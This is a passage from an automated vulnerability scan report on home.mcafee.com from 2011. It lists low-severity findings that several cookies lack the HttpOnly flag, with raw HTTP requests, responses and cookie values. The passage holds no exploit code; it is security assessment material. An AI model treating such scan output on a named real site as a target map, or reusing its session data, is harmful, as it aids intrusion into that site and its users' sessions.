<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><link rel="
...[SNIP]...

14.50. https://home.mcafee.com/ScriptResource.axd  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://home.mcafee.com
Path:   /ScriptResource.axd

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ScriptResource.axd HTTP/1.1
Host: home.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27mcafee%27%2C%271304109967310%27%5D%5D; lBounceURL=http://home.mcafee.com/secure/cart/; langid=1; HRntm=aff=0-0&cur=56&cid=86873&ct=1&lbu=http%3a%2f%2fhome.mcafee.com%2fsecure%2fcart%2f&pfl=UjYffYeSjxhItgwf9DZxCQ%3d%3d&ps=0869fcca3582e1333c8c705fde71a6b35b42445a53040511&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&isr=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; AffID=0-0; CookieInformation=locale=us; s_sq=%5B%5BB%5D%5D; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=86873; s_campaign=78228; CampaignId=86873; s_cc=true; HPrst=gu=65a488fe-5ba0-4de1-b3b4-ed8103de2143&loc=EN-US; IscartemptySiteidAffid=no-1-0; s_nr=1304109967309-New; s_vi=[CS]v1|26DD91D7051D181F-60000106600003DE[CE]; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a++%3cOrganicSearchtraffic%3e1%3c%2fOrganicSearchtraffic%3e%0d%0a++%3cwt_source_cid%3e86873%3c%2fwt_source_cid%3e%0d%0a++%3cwt_destination_cid%3e86873%3c%2fwt_destination_cid%3e%0d%0a++%3cBasketflowid%3e0%3c%2fBasketflowid%3e%0d%0a%3c%2fSessionData%3e; SiteID=1; Currency=56;

Response

HTTP/1.1 404 Not Found
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a++%3cOrganicSearchtraffic%3e1%3c%2fOrganicSearchtraffic%3e%0d%0a++%3cwt_source_cid%3e86873%3c%2fwt_source_cid%3e%0d%0a++%3cwt_destination_cid%3e86873%3c%2fwt_destination_cid%3e%0d%0a++%3cBasketflowid%3e0%3c%2fBasketflowid%3e%0d%0a%3c%2fSessionData%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: SiteID=1; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:18:44 GMT; path=/; HttpOnly
Set-Cookie: langid=1; domain=mcafee.com; expires=Mon, 29-Apr-2041 21:18:44 GMT; path=/; HttpOnly
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
X-Powered-By: ASP.NET
MS: SJV1
X-UA-Compatible: IE=8
Date: Fri, 29 Apr 2011 21:18:44 GMT
Connection: close
Content-Length: 9425


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmldom" xmlns="http://www.w3.org/1999/xhtml" dir="ltr"
...[SNIP]...

14.51. https://home.mcafee.com/Secure/Protected/Login.aspx  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://home.mcafee.com
Path:   /Secure/Protected/Login.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Secure/Protected/Login.aspx HTTP/1.1
Host: home.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27mcafee%27%2C%271304109967310%27%5D%5D; lBounceURL=http://home.mcafee.com/secure/cart/; langid=1; HRntm=aff=0-0&cur=56&cid=86873&ct=1&lbu=http%3a%2f%2fhome.mcafee.com%2fsecure%2fcart%2f&pfl=UjYffYeSjxhItgwf9DZxCQ%3d%3d&ps=0869fcca3582e1333c8c705fde71a6b35b42445a53040511&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&isr=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; AffID=0-0; CookieInformation=locale=us; s_sq=%5B%5BB%5D%5D; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=86873; s_campaign=78228; CampaignId=86873; s_cc=true; HPrst=gu=65a488fe-5ba0-4de1-b3b4-ed8103de2143&loc=EN-US; IscartemptySiteidAffid=no-1-0; s_nr=1304109967309-New; s_vi=[CS]v1|26DD91D7051D181F-60000106600003DE[CE]; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a++%3cOrganicSearchtraffic%3e1%3c%2fOrganicSearchtraffic%3e%0d%0a++%3cwt_source_cid%3e86873%3c%2fwt_source_cid%3e%0d%0a++%3cwt_destination_cid%3e86873%3c%2fwt_destination_cid%3e%0d%0a++%3cBasketflowid%3e0%3c%2fBasketflowid%3e%0d%0a%3c%2fSessionData%3e; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a++%3cOrganicSearchtraffic%3e1%3c%2fOrganicSearchtraffic%3e%0d%0a++%3cwt_source_cid%3e86873%3c%2fwt_source_cid%3e%0d%0a++%3cwt_destination_cid%3e86873%3c%2fwt_destination_cid%3e%0d%0a++%3cBasketflowid%3e0%3c%2fBasketflowid%3e%0d%0a%3c%2fSessionData%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: SiteID=1; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:18:21 GMT; path=/; HttpOnly
Set-Cookie: langid=1; domain=mcafee.com; expires=Mon, 29-Apr-2041 21:18:21 GMT; path=/; HttpOnly
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Locale=EN-US; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:18:21 GMT; path=/; HttpOnly
Set-Cookie: HPrst=gu=65a488fe-5ba0-4de1-b3b4-ed8103de2143&loc=EN-US; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:18:21 GMT; path=/; HttpOnly
Set-Cookie: AffID=0-0; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Currency=56; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: HRntm=aff=0-0&cur=56&piacct=l5hppVF9ZAZqvcqlqqTxbw%3d%3d&cid=86873&ct=1&lbu=http%3a%2f%2fhome.mcafee.com%2fsecure%2fcart%2f&pfl=UjYffYeSjxhItgwf9DZxCQ%3d%3d&ps=0869fcca3582e1333c8c705fde71a6b35b42445a53040511&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&isr=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: IscartemptySiteidAffid=no-1-0; domain=mcafee.com; path=/
X-Powered-By: ASP.NET
MS: SJV1
X-UA-Compatible: IE=8
Date: Fri, 29 Apr 2011 21:18:21 GMT
Content-Length: 52910
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmldom" xmlns="http://www.w3.org/1999/xhtml" dir="ltr"
...[SNIP]...

14.52. https://home.mcafee.com/WebResource.axd  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://home.mcafee.com
Path:   /WebResource.axd

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /WebResource.axd HTTP/1.1
Host: home.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27mcafee%27%2C%271304109967310%27%5D%5D; lBounceURL=http://home.mcafee.com/secure/cart/; langid=1; HRntm=aff=0-0&cur=56&cid=86873&ct=1&lbu=http%3a%2f%2fhome.mcafee.com%2fsecure%2fcart%2f&pfl=UjYffYeSjxhItgwf9DZxCQ%3d%3d&ps=0869fcca3582e1333c8c705fde71a6b35b42445a53040511&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&isr=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; AffID=0-0; CookieInformation=locale=us; s_sq=%5B%5BB%5D%5D; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=86873; s_campaign=78228; CampaignId=86873; s_cc=true; HPrst=gu=65a488fe-5ba0-4de1-b3b4-ed8103de2143&loc=EN-US; IscartemptySiteidAffid=no-1-0; s_nr=1304109967309-New; s_vi=[CS]v1|26DD91D7051D181F-60000106600003DE[CE]; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a++%3cOrganicSearchtraffic%3e1%3c%2fOrganicSearchtraffic%3e%0d%0a++%3cwt_source_cid%3e86873%3c%2fwt_source_cid%3e%0d%0a++%3cwt_destination_cid%3e86873%3c%2fwt_destination_cid%3e%0d%0a++%3cBasketflowid%3e0%3c%2fBasketflowid%3e%0d%0a%3c%2fSessionData%3e; SiteID=1; Currency=56;

Response

HTTP/1.1 404 Not Found
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a++%3cOrganicSearchtraffic%3e1%3c%2fOrganicSearchtraffic%3e%0d%0a++%3cwt_source_cid%3e86873%3c%2fwt_source_cid%3e%0d%0a++%3cwt_destination_cid%3e86873%3c%2fwt_destination_cid%3e%0d%0a++%3cBasketflowid%3e0%3c%2fBasketflowid%3e%0d%0a%3c%2fSessionData%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: SiteID=1; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:18:40 GMT; path=/; HttpOnly
Set-Cookie: langid=1; domain=mcafee.com; expires=Mon, 29-Apr-2041 21:18:40 GMT; path=/; HttpOnly
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
X-Powered-By: ASP.NET
MS: SJV8
X-UA-Compatible: IE=8
Date: Fri, 29 Apr 2011 21:18:40 GMT
Connection: close
Content-Length: 9425


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmldom" xmlns="http://www.w3.org/1999/xhtml" dir="ltr"
...[SNIP]...

14.53. https://home.mcafee.com/WebServices/AccountWebSvc.asmx/js  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://home.mcafee.com
Path:   /WebServices/AccountWebSvc.asmx/js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /WebServices/AccountWebSvc.asmx/js HTTP/1.1
Host: home.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27mcafee%27%2C%271304109967310%27%5D%5D; lBounceURL=http://home.mcafee.com/secure/cart/; langid=1; HRntm=aff=0-0&cur=56&cid=86873&ct=1&lbu=http%3a%2f%2fhome.mcafee.com%2fsecure%2fcart%2f&pfl=UjYffYeSjxhItgwf9DZxCQ%3d%3d&ps=0869fcca3582e1333c8c705fde71a6b35b42445a53040511&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&isr=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; AffID=0-0; CookieInformation=locale=us; s_sq=%5B%5BB%5D%5D; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=86873; s_campaign=78228; CampaignId=86873; s_cc=true; HPrst=gu=65a488fe-5ba0-4de1-b3b4-ed8103de2143&loc=EN-US; IscartemptySiteidAffid=no-1-0; s_nr=1304109967309-New; s_vi=[CS]v1|26DD91D7051D181F-60000106600003DE[CE]; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a++%3cOrganicSearchtraffic%3e1%3c%2fOrganicSearchtraffic%3e%0d%0a++%3cwt_source_cid%3e86873%3c%2fwt_source_cid%3e%0d%0a++%3cwt_destination_cid%3e86873%3c%2fwt_destination_cid%3e%0d%0a++%3cBasketflowid%3e0%3c%2fBasketflowid%3e%0d%0a%3c%2fSessionData%3e; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Type: application/x-javascript; charset=utf-8
Expires: Wed, 21 Apr 2010 22:42:19 GMT
Last-Modified: Thu, 21 Apr 2011 22:42:19 GMT
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a++%3cOrganicSearchtraffic%3e1%3c%2fOrganicSearchtraffic%3e%0d%0a++%3cwt_source_cid%3e86873%3c%2fwt_source_cid%3e%0d%0a++%3cwt_destination_cid%3e86873%3c%2fwt_destination_cid%3e%0d%0a++%3cBasketflowid%3e0%3c%2fBasketflowid%3e%0d%0a%3c%2fSessionData%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: SiteID=1; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:18:45 GMT; path=/; HttpOnly
Set-Cookie: langid=1; domain=mcafee.com; expires=Mon, 29-Apr-2041 21:18:45 GMT; path=/; HttpOnly
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Locale=EN-US; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:18:45 GMT; path=/; HttpOnly
Set-Cookie: HPrst=gu=65a488fe-5ba0-4de1-b3b4-ed8103de2143&loc=EN-US; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:18:45 GMT; path=/; HttpOnly
Set-Cookie: AffID=0-0; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Currency=56; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: HRntm=aff=0-0&cur=56&cid=86873&ct=1&lbu=http%3a%2f%2fhome.mcafee.com%2fsecure%2fcart%2f&pfl=UjYffYeSjxhItgwf9DZxCQ%3d%3d&ps=0869fcca3582e1333c8c705fde71a6b35b42445a53040511&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&isr=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: IscartemptySiteidAffid=no-1-0; domain=mcafee.com; path=/
X-Powered-By: ASP.NET
MS: SJV4
X-UA-Compatible: IE=8
Date: Fri, 29 Apr 2011 21:18:44 GMT
Content-Length: 4551
Connection: close

Type.registerNamespace('McAfee.WebServices');
McAfee.WebServices.AccountWebSvc=function() {
McAfee.WebServices.AccountWebSvc.initializeBase(this);
this._timeout = 0;
this._userContext = null;
thi
...[SNIP]...

14.54. https://home.mcafee.com/secure/cart  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://home.mcafee.com
Path:   /secure/cart

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /secure/cart HTTP/1.1
Host: home.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27mcafee%27%2C%271304109967310%27%5D%5D; lBounceURL=http://home.mcafee.com/secure/cart/; langid=1; HRntm=aff=0-0&cur=56&cid=86873&ct=1&lbu=http%3a%2f%2fhome.mcafee.com%2fsecure%2fcart%2f&pfl=UjYffYeSjxhItgwf9DZxCQ%3d%3d&ps=0869fcca3582e1333c8c705fde71a6b35b42445a53040511&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&isr=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; AffID=0-0; CookieInformation=locale=us; s_sq=%5B%5BB%5D%5D; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=86873; s_campaign=78228; CampaignId=86873; s_cc=true; HPrst=gu=65a488fe-5ba0-4de1-b3b4-ed8103de2143&loc=EN-US; IscartemptySiteidAffid=no-1-0; s_nr=1304109967309-New; s_vi=[CS]v1|26DD91D7051D181F-60000106600003DE[CE]; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a++%3cOrganicSearchtraffic%3e1%3c%2fOrganicSearchtraffic%3e%0d%0a++%3cwt_source_cid%3e86873%3c%2fwt_source_cid%3e%0d%0a++%3cwt_destination_cid%3e86873%3c%2fwt_destination_cid%3e%0d%0a++%3cBasketflowid%3e0%3c%2fBasketflowid%3e%0d%0a%3c%2fSessionData%3e; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a++%3cOrganicSearchtraffic%3e1%3c%2fOrganicSearchtraffic%3e%0d%0a++%3cwt_source_cid%3e86873%3c%2fwt_source_cid%3e%0d%0a++%3cwt_destination_cid%3e86873%3c%2fwt_destination_cid%3e%0d%0a++%3cBasketflowid%3e0%3c%2fBasketflowid%3e%0d%0a%3c%2fSessionData%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: SiteID=1; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:18:29 GMT; path=/; HttpOnly
Set-Cookie: langid=1; domain=mcafee.com; expires=Mon, 29-Apr-2041 21:18:29 GMT; path=/; HttpOnly
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: lBounceURL=http://home.mcafee.com/secure/cart; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Locale=EN-US; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:18:29 GMT; path=/; HttpOnly
Set-Cookie: HPrst=gu=65a488fe-5ba0-4de1-b3b4-ed8103de2143&loc=EN-US; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:18:29 GMT; path=/; HttpOnly
Set-Cookie: AffID=0-0; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Currency=56; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: HRntm=aff=0-0&cur=56&cid=86873&ct=1&lbu=http%3a%2f%2fhome.mcafee.com%2fsecure%2fcart&pfl=UjYffYeSjxhItgwf9DZxCQ%3d%3d&ps=0869fcca3582e1333c8c705fde71a6b35b42445a53040511&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&isr=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: IscartemptySiteidAffid=no-1-0; domain=mcafee.com; path=/
X-Powered-By: ASP.NET
MS: SJV8
X-UA-Compatible: IE=8
Date: Fri, 29 Apr 2011 21:18:29 GMT
Content-Length: 37490
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmldom" xmlns="http://www.w3.org/1999/xhtml" dir="ltr"
...[SNIP]...

14.55. https://home.mcafee.com/secure/cart/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://home.mcafee.com
Path:   /secure/cart/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /secure/cart/ HTTP/1.1
Host: home.mcafee.com
Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SessionInfo=AffiliateId=0&CampaignId=78228; s_cc=true; s_campaign=78228; s_nr=1304109967309-New; s_ev8=%5B%5B%27mcafee%27%2C%271304109967310%27%5D%5D; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26DD91D7051D181F-60000106600003DE[CE]; CampaignId=86873; CookieInformation=locale=us; SiteID=1; SessionInfo=AffiliateId=0&CampaignId=86873; HPrst=gu=65a488fe-5ba0-4de1-b3b4-ed8103de2143&loc=EN-US; Currency=56; HRntm=aff=0-0&cur=56&cid=86873&ct=1&lbu=http%3a%2f%2fhome.mcafee.com%2fsecure%2fcart%2f%3fofferId%3d266730%26PkgQty%3d1&pfl=UjYffYeSjxhItgwf9DZxCQ%3d%3d&ps=0869fcca3582e1333c8c705fde71a6b35b42445a53040511&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&isr=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; IscartemptySiteidAffid=no-1-0; AffID=0; Locale=en%2Dus; langid=1; lBounceURL=http%3A%2F%2Fus%2Emcafee%2Ecom%2Froot%2Fbasket%2Easp%3Faffid%3D0%26; lUsrCtxSession=%3CUserContext%3E%3CAffID%3E0%3C%2FAffID%3E%3CAffBuildID%3E0%3C%2FAffBuildID%3E%3C%2FUserContext%3E%0D%0A; session%5Fdata=%3CSessionData%3E%0D%0A%09%3Ctempfrlu%3E%3C%2Ftempfrlu%3E%0D%0A%09%3Cwt%5Fsource%3EOther%3C%2Fwt%5Fsource%3E%0D%0A%09%3COrganicSearchtraffic%3E1%3C%2FOrganicSearchtraffic%3E%0D%0A%09%3Cwt%5Fsource%5Fcid%3E86873%3C%2Fwt%5Fsource%5Fcid%3E%0D%0A%09%3Cwt%5Fdestination%5Fcid%3E86873%3C%2Fwt%5Fdestination%5Fcid%3E%0D%0A%09%3CBasketflowid%3E0%3C%2FBasketflowid%3E%3C%2FSessionData%3E%0D%0A

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a++%3cOrganicSearchtraffic%3e1%3c%2fOrganicSearchtraffic%3e%0d%0a++%3cwt_source_cid%3e86873%3c%2fwt_source_cid%3e%0d%0a++%3cwt_destination_cid%3e86873%3c%2fwt_destination_cid%3e%0d%0a++%3cBasketflowid%3e0%3c%2fBasketflowid%3e%0d%0a%3c%2fSessionData%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: SiteID=1; domain=mcafee.com; expires=Thu, 29-Apr-2021 20:58:11 GMT; path=/; HttpOnly
Set-Cookie: langid=1; domain=mcafee.com; expires=Mon, 29-Apr-2041 20:58:11 GMT; path=/; HttpOnly
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: lBounceURL=http://home.mcafee.com/secure/cart/; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Locale=EN-US; domain=mcafee.com; expires=Thu, 29-Apr-2021 20:58:11 GMT; path=/; HttpOnly
Set-Cookie: HPrst=gu=65a488fe-5ba0-4de1-b3b4-ed8103de2143&loc=EN-US; domain=mcafee.com; expires=Thu, 29-Apr-2021 20:58:11 GMT; path=/; HttpOnly
Set-Cookie: AffID=0-0; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Currency=56; domain=mcafee.com; path=/; HttpOnly
